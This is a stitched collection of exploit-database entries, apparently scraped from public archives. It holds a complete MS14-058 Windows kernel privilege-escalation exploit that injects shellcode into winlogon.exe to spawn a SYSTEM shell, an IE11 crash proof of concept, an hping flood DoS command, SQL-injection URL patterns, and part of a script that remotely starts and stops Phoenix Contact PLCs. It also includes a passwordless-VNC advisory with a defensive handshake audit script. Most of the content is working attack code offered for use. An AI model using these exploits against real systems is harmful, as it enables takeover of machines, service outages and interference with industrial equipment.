source: https://www.securityfocus.com/bid/52893/info
Sony Bravia is prone to a remote denial-of-service vulnerability.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
hping -S TV.IP.Address -p anyport -i u1 --flood
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
source: https://www.securityfocus.com/bid/52897/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.10 is vulnerable; other versions may also be affected.
http://www.example.com/announcement.php?a=&announcementid=[Sql]
source: https://www.securityfocus.com/bid/52908/info
TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.
http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
# Windows 8.0 - 8.1 x64 TrackPopupMenu Privilege Escalation (MS14-058)
# CVE-2014-4113 Privilege Escalation
# http://www.offensive-security.com
# Thx to Moritz Jodeit for the beautiful writeup
# http://www.exploit-db.com/docs/35152.pdf
# Target OS Windows 8.0 - 8.1 x64
# Author: Matteo Memelli ryujin <at> offensive-security.com
# EDB Note: Swapping the shellcode for a bind or reverse shell will BSOD the machine.
from ctypes import *
from ctypes.wintypes import *
import struct, sys, os, time, threading, signal

ULONG_PTR = PVOID = LPVOID
HCURSOR = HICON
PDWORD = POINTER(DWORD)
PQWORD = POINTER(LPVOID)
LRESULT = LPVOID
UCHAR = c_ubyte
QWORD = c_ulonglong
CHAR = c_char
NTSTATUS = DWORD
MIIM_STRING = 0x00000040
MIIM_SUBMENU = 0x00000004
WH_CALLWNDPROC = 0x4
GWLP_WNDPROC = -0x4
NULL = 0x0
SystemExtendedHandleInformation = 64
ObjectDataInformation = 2
STATUS_INFO_LENGTH_MISMATCH = 0xC0000004
STATUS_BUFFER_OVERFLOW = 0x80000005L
STATUS_INVALID_HANDLE = 0xC0000008L
STATUS_BUFFER_TOO_SMALL = 0xC0000023L
STATUS_SUCCESS = 0
TOKEN_ALL_ACCESS = 0xf00ff
DISABLE_MAX_PRIVILEGE = 0x1
FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000
PAGE_EXECUTE_READWRITE = 0x00000040
PROCESS_ALL_ACCESS = ( 0x000F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )
TH32CS_SNAPPROCESS = 0x02
WinFunc1 = WINFUNCTYPE(LPVOID, INT, WPARAM, LPARAM)
WinFunc2 = WINFUNCTYPE(HWND, LPVOID, INT, WPARAM, LPARAM)
WNDPROC = WINFUNCTYPE(LPVOID, HWND, UINT, WPARAM, LPARAM)
bWndProcFlag = False
bHookCallbackFlag = False
EXPLOITED = False
Hmenu01 = Hmenu02 = None

# /*
# * windows/x64/exec - 275 bytes
# * http://www.metasploit.com
# * VERBOSE=false, PrependMigrate=false, EXITFUNC=thread,
# * CMD=cmd.exe
# */
SHELLCODE = (
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
"\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41"
"\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48"
"\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01"
"\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48"
"\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0"
"\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c"
"\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0"
"\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04"
"\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59"
"\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48"
"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00"
"\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f"
"\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff"
"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb"
"\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64"
"\x2e\x65\x78\x65\x00")

class LSA_UNICODE_STRING(Structure):
    """Represent the LSA_UNICODE_STRING on ntdll."""
    _fields_ = [
        ("Length", USHORT),
        ("MaximumLength", USHORT),
        ("Buffer", LPWSTR),
    ]

class SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX(Structure):
    """Represent the SYSTEM_HANDLE_TABLE_ENTRY_INFO on ntdll."""
    _fields_ = [
        ("Object", PVOID),
        ("UniqueProcessId", PVOID),
        ("HandleValue", PVOID),
        ("GrantedAccess", ULONG),
        ("CreatorBackTraceIndex", USHORT),
        ("ObjectTypeIndex", USHORT),
        ("HandleAttributes", ULONG),
        ("Reserved", ULONG),
    ]

class SYSTEM_HANDLE_INFORMATION_EX(Structure):
    """Represent the SYSTEM_HANDLE_INFORMATION on ntdll."""
    _fields_ = [
        ("NumberOfHandles", PVOID),
        ("Reserved", PVOID),
        ("Handles", SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * 1),
    ]

class PUBLIC_OBJECT_TYPE_INFORMATION(Structure):
    """Represent the PUBLIC_OBJECT_TYPE_INFORMATION on ntdll."""
    _fields_ = [
        ("Name", LSA_UNICODE_STRING),
        ("Reserved", ULONG * 22),
    ]

class MENUITEMINFO(Structure):
    """Contains information about a menu item."""
    _fields_ = [
        ("cbSize" , UINT),
        ("fMask" , UINT),
        ("fType" , UINT),
        ("fState" , UINT),
        ("wID" , UINT),
        ("hSubMenu" , HMENU),
        ("hbmpChecked" , HBITMAP),
        ("hbmpUnchecked", HBITMAP),
        ("dwItemData" , ULONG_PTR),
        ("dwTypeData" , LPWSTR),
        ("cch" , UINT),
        ("hbmpItem" , HBITMAP),
    ]

class WNDCLASS(Structure):
    """Contains the window class attributes that are registered by the
    RegisterClass function."""
    _fields_ = [
        ("style" , UINT),
        ("lpfnWndProc" , WNDPROC),
        ("cbClsExtra" , INT),
        ("cbWndExtra" , INT),
        ("hInstance" , HINSTANCE),
        ("hIcon" , HCURSOR),
        ("hCursor" , HBITMAP),
        ("hbrBackground", HBRUSH),
        ("lpszMenuName" , LPWSTR),
        ("lpszClassName", LPWSTR),
    ]

class PROCESSENTRY32(Structure):
    """Describes an entry from a list of the processes residing in the system
    address space when a snapshot was taken."""
    _fields_ = [ ( 'dwSize' , DWORD ) ,
                 ( 'cntUsage' , DWORD) ,
                 ( 'th32ProcessID' , DWORD) ,
                 ( 'th32DefaultHeapID' , POINTER(ULONG)) ,
                 ( 'th32ModuleID' , DWORD) ,
                 ( 'cntThreads' , DWORD) ,
                 ( 'th32ParentProcessID' , DWORD) ,
                 ( 'pcPriClassBase' , LONG) ,
                 ( 'dwFlags' , DWORD) ,
                 ( 'szExeFile' , CHAR * MAX_PATH )
               ]

user32 = windll.user32
kernel32 = windll.kernel32
ntdll = windll.ntdll
advapi32 = windll.advapi32

user32.PostMessageW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.PostMessageW.restype = BOOL
user32.DefWindowProcW.argtypes = [HWND, UINT, WPARAM, LPARAM]
user32.DefWindowProcW.restype = LRESULT
user32.UnhookWindowsHook.argtypes = [DWORD, WinFunc1]
user32.UnhookWindowsHook.restype = BOOL
user32.SetWindowLongPtrW.argtypes = [HWND, DWORD, WinFunc2]
user32.SetWindowLongPtrW.restype = LPVOID
user32.CallNextHookEx.argtypes = [DWORD, DWORD, WPARAM, LPARAM]
user32.CallNextHookEx.restype = LRESULT
user32.RegisterClassW.argtypes = [LPVOID]
user32.RegisterClassW.restype = BOOL
user32.CreateWindowExW.argtypes = [DWORD, LPWSTR, LPWSTR, DWORD,
                                   INT, INT, INT, INT, HWND, HMENU,
                                   HINSTANCE, LPVOID]
user32.CreateWindowExW.restype = HWND
user32.InsertMenuItemW.argtypes = [HMENU, UINT, BOOL, LPVOID]
user32.InsertMenuItemW.restype = BOOL
user32.DestroyMenu.argtypes = [HMENU]
user32.DestroyMenu.restype = BOOL
user32.SetWindowsHookExW.argtypes = [DWORD, WinFunc1, DWORD, DWORD]
user32.SetWindowsHookExW.restype = BOOL
user32.TrackPopupMenu.argtypes = [HMENU, UINT, INT, INT, INT, HWND,
                                  DWORD]
user32.TrackPopupMenu.restype = BOOL
advapi32.OpenProcessToken.argtypes = [HANDLE, DWORD , POINTER(HANDLE)]
advapi32.OpenProcessToken.restype = BOOL
advapi32.CreateRestrictedToken.argtypes = [HANDLE, DWORD, DWORD, DWORD,
                                           DWORD, DWORD, DWORD, DWORD,
                                           POINTER(HANDLE)]
advapi32.CreateRestrictedToken.restype = BOOL
advapi32.AdjustTokenPrivileges.argtypes = [HANDLE, BOOL, DWORD, DWORD,
                                           DWORD, DWORD]
advapi32.AdjustTokenPrivileges.restype = BOOL
advapi32.ImpersonateLoggedOnUser.argtypes = [HANDLE]
advapi32.ImpersonateLoggedOnUser.restype = BOOL
kernel32.GetCurrentProcess.restype = HANDLE
kernel32.WriteProcessMemory.argtypes = [HANDLE, QWORD, LPCSTR, DWORD,
                                        POINTER(LPVOID)]
kernel32.WriteProcessMemory.restype = BOOL
kernel32.OpenProcess.argtypes = [DWORD, BOOL, DWORD]
kernel32.OpenProcess.restype = HANDLE
kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD,
                                    DWORD]
kernel32.VirtualAllocEx.restype = LPVOID
kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD,
                                        LPVOID, DWORD, POINTER(HANDLE)]
kernel32.CreateRemoteThread.restype = BOOL
kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD]
kernel32.CreateToolhelp32Snapshot.restype = HANDLE
kernel32.CloseHandle.argtypes = [HANDLE]
kernel32.CloseHandle.restype = BOOL
kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32First.restype = BOOL
kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32Next.restype = BOOL
kernel32.GetCurrentThreadId.restype = DWORD
ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID,
                                          ULONG, DWORD]
ntdll.NtAllocateVirtualMemory.restype = NTSTATUS
ntdll.NtQueryObject.argtypes = [HANDLE, DWORD,
                                POINTER(PUBLIC_OBJECT_TYPE_INFORMATION),
                                DWORD, DWORD]
ntdll.NtQueryObject.restype = NTSTATUS
ntdll.NtQuerySystemInformation.argtypes = [DWORD,
                                           POINTER(SYSTEM_HANDLE_INFORMATION_EX),
                                           DWORD, POINTER(DWORD)]
ntdll.NtQuerySystemInformation.restype = NTSTATUS

def log(msg, e=None):
    # "e" = error, "d" = debug/banner, anything else = info
    if e == "e":
        msg = "[!] " + msg
    elif e == "d":
        msg = "[*] " + msg
    else:
        msg = "[+] " + msg
    print msg

def getLastError():
    """Format GetLastError"""
    buf = create_string_buffer(2048)
    if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
                               kernel32.GetLastError(), 0,
                               buf, sizeof(buf), NULL):
        log(buf.value, "e")
    else:
        log("Unknown Error", "e")

class x_file_handles (Exception):
    pass

def get_type_info(handle):
    """Get the handle type information."""
    public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
    size = DWORD(sizeof(public_object_type_information))
    while True:
        result = ntdll.NtQueryObject(handle, ObjectDataInformation,
                                     byref(public_object_type_information), size, 0x0)
        if result == STATUS_SUCCESS:
            return public_object_type_information.Name.Buffer
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(public_object_type_information, size.value)
        elif result == STATUS_INVALID_HANDLE:
            return "INVALID HANDLE: %s" % hex(handle)
        else:
            raise x_file_handles("NtQueryObject", hex(result))

def get_handles():
    """Return all the open handles in the system"""
    system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
    size = DWORD (sizeof (system_handle_information))
    while True:
        result = ntdll.NtQuerySystemInformation(
            SystemExtendedHandleInformation,
            byref(system_handle_information),
            size,
            byref(size)
        )
        if result == STATUS_SUCCESS:
            break
        elif result == STATUS_INFO_LENGTH_MISMATCH:
            size = DWORD(size.value * 4)
            resize(system_handle_information, size.value)
        else:
            raise x_file_handles("NtQuerySystemInformation", hex(result))
    pHandles = cast(
        system_handle_information.Handles,
        POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
                system_handle_information.NumberOfHandles)
    )
    for handle in pHandles.contents:
        yield handle.UniqueProcessId, handle.HandleValue, handle.Object

def WndProc(hwnd, message, wParam, lParam):
    """Window procedure"""
    global bWndProcFlag
    if message == 289 and not bWndProcFlag:
        bWndProcFlag = True
        user32.PostMessageW(hwnd, 256, 40, 0)
        user32.PostMessageW(hwnd, 256, 39, 0)
        user32.PostMessageW(hwnd, 513, 0, 0)
    return user32.DefWindowProcW(hwnd, message, wParam, lParam)

def hook_callback_one(code, wParam, lParam):
    """Sets a new address for the window procedure"""
    global bHookCallbackFlag
    if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\
       not bHookCallbackFlag:
        bHookCallbackFlag = True
        if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01):
            # Sets a new address for the window procedure
            log("Callback triggered!")
            log("Setting the new address for the window procedure...")
            lpPrevWndFunc = user32.SetWindowLongPtrW\
                ((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value,
                 GWLP_WNDPROC, CALLBACK02)
    return user32.CallNextHookEx(0, code, wParam, lParam)

def hook_callback_two(hWnd, Msg, wParam, lParam):
    """Once called will return the fake tagWND address"""
    global EXPLOITED
    user32.EndMenu()
    EXPLOITED = True
    log("Returning the fake tagWND and overwriting token privileges...")
    return 0x00000000FFFFFFFB

def buildMenuAndTrigger():
    """Create menus and invoke TrackPopupMenu"""
    global Hmenu01, Hmenu02
    log("Creating windows and menus...")
    wndClass = WNDCLASS()
    wndClass.lpfnWndProc = WNDPROC(WndProc)
    wndClass.lpszClassName = u"pwned"
    wndClass.cbClsExtra = wndClass.cbWndExtra = 0
    # Registering Class
    if not user32.RegisterClassW(addressof(wndClass)):
        log("RegisterClassW failed", "e")
        sys.exit()
    # Creating the Window
    hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0,
                                  0, NULL, NULL, NULL, NULL)
    if not hWnd:
        log("CreateWindowExW Failed", "e")
        sys.exit()
    # Creating popup menu
    user32.CreatePopupMenu.restype = HMENU
    Hmenu01 = user32.CreatePopupMenu()
    if not Hmenu01:
        log("CreatePopupMenu failed 0x1", "e")
        sys.exit()
    Hmenu01Info = MENUITEMINFO()
    Hmenu01Info.cbSize = sizeof(MENUITEMINFO)
    Hmenu01Info.fMask = MIIM_STRING
    # Insert first menu
    if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)):
        log("Error in InsertMenuItemW 0x1", "e")
        user32.DestroyMenu(Hmenu01)
        sys.exit()
    # Creating second menu
    Hmenu02 = user32.CreatePopupMenu()
    if not Hmenu02:
        log("CreatePopupMenu failed 0x2", "e")
        sys.exit()
    Hmenu02Info = MENUITEMINFO()
    Hmenu02Info.cbSize = sizeof(MENUITEMINFO)
    Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU)
    Hmenu02Info.dwTypeData = ""
    Hmenu02Info.cch = 1
    Hmenu02Info.hSubMenu = Hmenu01
    # Insert second menu
    if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)):
        log("Error in InsertMenuItemW 0x2", "e")
        # Release both menus before bailing out
        user32.DestroyMenu(Hmenu01)
        user32.DestroyMenu(Hmenu02)
        sys.exit()
    # Set window callback
    tid = kernel32.GetCurrentThreadId()
    if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid):
        log("Failed SetWindowsHookExW 0x1", "e")
        sys.exit()
    # Crash it!
    log("Invoking TrackPopupMenu...")
    user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL)

def alloctagWND():
    """Allocate a fake tagWND in userspace at address 0x00000000fffffff0"""
    hProcess = HANDLE(kernel32.GetCurrentProcess())
    hToken = HANDLE()
    hRestrictedToken = HANDLE()
    if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)):
        log("Could not open current process token", "e")
        getLastError()
        sys.exit()
    if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0,
                                          0, 0, 0, 0, byref(hRestrictedToken)):
        log("Could not create the restricted token", "e")
        getLastError()
        sys.exit()
    if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0,
                                          NULL, NULL):
        log("Could not adjust privileges to the restricted token", "e")
        getLastError()
        sys.exit()
    # Leak Token addresses in kernel space
    log("Leaking token addresses from kernel space...")
    for pid, handle, obj in get_handles():
        if pid==os.getpid() and get_type_info(handle) == "Token":
            if hToken.value == handle:
                log("Current process token address: %x" % obj)
            if hRestrictedToken.value == handle:
                log("Restricted token address: %x" % obj)
                RestrictedToken = obj
    CurrentProcessWin32Process = "\x00"*8
    # nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES
    # +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8
    TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8)
    tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\
             "\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\
             "\x00"*8 +\
             "\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\
             TokenAddress + "\x47"*0x28
    ## Allocate space for the input buffer
    lpBaseAddress = LPVOID(0x00000000fffffff0)
    Zerobits = ULONG(0)
    RegionSize = LPVOID(0x1000)
    written = LPVOID(0)
    dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff,
                                             byref(lpBaseAddress),
                                             0x0,
                                             byref(RegionSize),
                                             VIRTUAL_MEM,
                                             PAGE_EXECUTE_READWRITE)
    if dwStatus != STATUS_SUCCESS:
        log("Failed to allocate tagWND object", "e")
        getLastError()
        sys.exit()
    # Copy input buffer to the fake tagWND
    nSize = 0x200
    written = LPVOID(0)
    lpBaseAddress = QWORD(0x00000000fffffff0)
    dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff,
                                           lpBaseAddress,
                                           tagWND,
                                           nSize,
                                           byref(written))
    if dwStatus == 0:
        log("Failed to copy the input buffer to the tagWND object", "e")
        getLastError()
        sys.exit()
    log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\
        (written.value, lpBaseAddress.value))
    return hRestrictedToken

def injectShell(hPrivilegedToken):
    """Impersonate privileged token and inject shellcode into winlogon.exe"""
    while not EXPLOITED:
        time.sleep(0.1)
    log("-"*70)
    log("Impersonating the privileged token...")
    if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken):
        log("Could not impersonate the privileged token", "e")
        getLastError()
        sys.exit()
    # Get winlogon.exe pid
    pid = getpid("winlogon.exe")
    # Get a handle to the winlogon process we are injecting into
    hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
    if not hProcess:
        log("Couldn't acquire a handle to PID: %s" % pid, "e")
        sys.exit()
    log("Obtained handle 0x%x for the winlogon.exe process" % hProcess)
    # Creating shellcode buffer to inject into the host process
    sh = create_string_buffer(SHELLCODE, len(SHELLCODE))
    code_size = len(SHELLCODE)
    # Allocate some space for the shellcode (in the program memory)
    sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM,
                                         PAGE_EXECUTE_READWRITE)
    if not sh_address:
        log("Could not allocate shellcode in the remote process", "e")
        getLastError()
        sys.exit()
    log("Allocated memory at address 0x%x" % sh_address)
    # Inject shellcode in to winlogon.exe process space
    written = LPVOID(0)
    shellcode = QWORD(sh_address)
    dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size,
                                           byref(written))
    if not dwStatus:
        log("Could not write shellcode into winlogon.exe", "e")
        getLastError()
        sys.exit()
    log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address))
    # Now we create the remote thread and point its entry routine to be head of
    # our shellcode
    thread_id = HANDLE(0)
    if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0,
                                       byref(thread_id)):
        log("Failed to inject shellcode into winlogon.exe", "e")
        sys.exit(0)
    log("Remote thread 0x%08x created" % thread_id.value)
    log("Spawning SYSTEM shell...")
    # Kill python process to kill the window and avoid BSODs
    os.kill(os.getpid(), signal.SIGABRT)

def getpid(procname):
    """ Get Process Pid by procname """
    pid = None
    try:
        hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
        pe32 = PROCESSENTRY32()
        pe32.dwSize = sizeof(PROCESSENTRY32)
        ret = kernel32.Process32First(hProcessSnap , byref(pe32))
        while ret:
            if pe32.szExeFile == LPSTR(procname).value:
                pid = pe32.th32ProcessID
            ret = kernel32.Process32Next(hProcessSnap, byref(pe32))
        kernel32.CloseHandle ( hProcessSnap )
    except Exception, e:
        log(str(e), "e")
    if not pid:
        log("Could not find %s PID" % procname)
        sys.exit()
    return pid

CALLBACK01 = WinFunc1(hook_callback_one)
CALLBACK02 = WinFunc2(hook_callback_two)

if __name__ == '__main__':
    log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com",
        "d")
    # Prepare the battlefield
    hPrivilegedToken = alloctagWND()
    # Start the injection thread
    t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,))
    t1.daemon = False
    t1.start()
    # Trigger the vuln
    buildMenuAndTrigger()
Comodo GeekBuddy Local Privilege Escalation (CVE-2014-7872)
Jeremy Brown [jbrown3264/gmail]
-Synopsis-
Comodo GeekBuddy, which is bundled with Comodo Anti-Virus, Comodo Firewall
and Comodo Internet Security, runs a passwordless, background VNC server
and listens for incoming connections. This can allow for at least local
privilege escalation on several platforms. It also may be remotely
exploitable via CSRF-like attacks utilizing a modified web-based VNC client
(eg. a Java VNC client).
-Repro-
1) Install GeekBuddy (either standalone or bundled with the aforementioned
packages)
2) Administrator (or other user) logs into the system so the VNC server
will be started
3) Start another login to the system (eg. target OS is Windows Server)
4) Connect to the VNC server on localhost to assume the Admin session
-Fix-
Comodo says they have fixed this vulnerability with the v4.18.121 release in
October 2014.
-References-
https://technet.microsoft.com/en-US/dn613815
http://archive.hack.lu/2014/Microsoft%20Vulnerability%20Research%20-%20How%20to%20be%20a%20Finder%20as%20a%20Vendor.pdf
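An audit check for the class of issue in this advisory, added here and not part of Brown's advisory or Comodo's software: it performs the first two messages of the RFB (VNC) handshake against a listener and reports whether the server offers the "None" security type, i.e. will grant a session with no password at all. It assumes a standard RFB server on the default port 5900 (the advisory does not state which port GeekBuddy listens on); the handshake bytes used in the parsing functions are constructed for the demonstration.

```python
import socket
import struct

# Security-type numbers defined by the RFB protocol (RFC 6143, section 7.1.2);
# type 1 ("None") means the server grants a session without any authentication.
RFB_SECURITY_NONE = 1
SECURITY_NAMES = {0: "Invalid", 1: "None", 2: "VNC Authentication",
                  5: "RA2", 6: "RA2ne", 16: "Tight", 18: "TLS", 19: "VeNCrypt"}


def parse_protocol_version(banner):
    """Parse the 12-byte 'RFB xxx.yyy\\n' banner the server sends first."""
    if len(banner) != 12 or not banner.startswith(b"RFB ") or banner[-1:] != b"\n":
        raise ValueError("not an RFB banner: %r" % (banner,))
    return int(banner[4:7]), int(banner[8:11])


def parse_security_types(version, data):
    """Return the list of security types the server offers.

    RFB 3.3 sends a single big-endian 4-byte type; 3.7 and later send a
    1-byte count followed by that many 1-byte types. A count of 0 means the
    server refused the connection and a length-prefixed reason follows.
    """
    if version < (3, 7):
        if len(data) < 4:
            raise ValueError("truncated RFB 3.3 security message")
        return [struct.unpack(">I", data[:4])[0]]
    if not data:
        raise ValueError("empty security-types message")
    count = data[0]
    if count == 0:
        reason_len = struct.unpack(">I", data[1:5])[0] if len(data) >= 5 else 0
        raise ValueError("server refused connection: %r" % (data[5:5 + reason_len],))
    if len(data) < 1 + count:
        raise ValueError("truncated security-types list")
    return list(data[1:1 + count])


def assess(banner, security_msg):
    """Combine the two handshake messages into an audit verdict."""
    version = parse_protocol_version(banner)
    types = parse_security_types(version, security_msg)
    return {
        "version": "%d.%d" % version,
        "types": [SECURITY_NAMES.get(t, "type %d" % t) for t in types],
        "passwordless": RFB_SECURITY_NONE in types,
    }


def audit_vnc(host="127.0.0.1", port=5900, timeout=3.0):
    """Run the handshake against a live listener and return assess()'s verdict."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        banner = sock.recv(12)
        version = parse_protocol_version(banner)
        # Echo the server's version, capped at 3.8, so it proceeds to the
        # security-types message instead of dropping us.
        major, minor = min(version, (3, 8))
        sock.sendall(b"RFB %03d.%03d\n" % (major, minor))
        security_msg = sock.recv(256)
    return assess(banner, security_msg)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    print(audit_vnc(target))
```

A "passwordless": True verdict on a host that runs GeekBuddy is the condition the advisory describes; the fix is the vendor update, or at minimum blocking the listener from anything but the local session.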
#!/usr/bin/env python
'''
# Exploit Title: Phoenix Contact ILC 150 ETH PLC Remote Control script
# Date: 2015-05-19
# Exploit Author: Photubias - tijl[dot]deneut[at]howest[dot]be
# Vendor Homepage: https://www.phoenixcontact.com/online/portal/us?urile=pxc-oc-itemdetail:pid=2985330
# Version: ALL FW VERSIONS
# Tested on: Python runs on Windows, Linux
# CVE : CVE-2014-9195
Copyright 2015 Photubias(c)
Written for Howest(c) University College
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
File name ControlPLC.py
written by tijl[dot]deneut[at]howest[dot]be
This POC will print out the current status of the PLC, continuously every 0.1 second, after 3 seconds it reverts (start becomes stop, stop becomes cold start), and stops after 5 seconds
Works on ILC 15x ETH, partly on RFC 43x, partly on ILC 39x
'''
import sys, socket, binascii, time, os, select, re

IP=''
infoport=1962
controlport=41100

## Defining Functions First
def send_and_recv(s,size,strdata):
    data = binascii.unhexlify(strdata) ## Convert to real HEX (\x00\x00 ...)
    s.send(data)
    ret = s.recv(4096)
    return ret

def doAction(s,strdata):
    ret = send_and_recv(s,1000,strdata)
    # The official client sends these as well; they do not seem to be needed
    send_and_recv(s,1000,packet1)
    send_and_recv(s,1000,packet2)
    send_and_recv(s,1000,packet2)
    ret = send_and_recv(s,1000,'010002000000020003000100000000000840')
    send_and_recv(s,1000,packet2)
    return ret

def initMonitor(s):
    send_and_recv(s,1000,'0100000000002f00000000000000cfff4164652e52656d6f74696e672e53657276696365732e4950726f436f6e4f53436f6e74726f6c536572766963653200')
